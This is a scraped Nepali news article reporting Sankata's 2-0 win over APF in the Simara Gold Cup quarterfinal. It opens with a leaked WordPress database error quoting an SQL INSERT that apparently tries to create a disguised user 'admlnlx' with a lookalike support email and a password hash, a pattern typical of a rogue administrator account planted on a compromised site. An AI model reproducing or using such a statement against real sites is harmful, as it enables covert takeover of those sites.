WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BwA8SUJYgOS.1tf0SuBiSVUC5xpiso0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-06 11:41:28', '', 'admlnlx', 'admlnlx')
सिमरा,माघ २१-
सिएमजी संकटा आठौं रुस्लान सिमरा गोल्डकपको सेमिफाइनलमा प्रवेश गरेको छ। शुक्रबार सिमरा रंगशालमा भएको खेलमा विभागीय क्लब सशस्त्र प्रहरी बलको एपीएफलाई २-० ले पराजित गर्दै अन्तिम चारमा पुगेको हो।
संकटालाई जित दिलाउन राजु पौडेल र सुशिल केसीले पहिलो हाफमा १/१ गोल गरे।राजु पौडेलले ४१ औं मिनेटमा गोल गर्दै संकटालाई अग्रता दिलाए। पहिलो हाफको इन्जुरी टाइममा सुशिल केसीले गोल गर्दै दोब्बर पारे। दोस्रो हाफमा दुवै तर्फबाट कुनै पनि गोल नभएपछि संकटा २-० ले विजयी भयो।
संकटाले अब सेमिफाइनलमा काठमाडौंको सरस्वती युथ कलब र हेटौंडाको विजय युथ क्लबबीचको विजेतासँग खेल्नेछ।प्रतियोगिता अन्तर्गत शनिबार वीरगन्ज युथ युनाइटेड र पोखराको सहारा क्लबीच प्रतिस्पर्धा हुनेछ।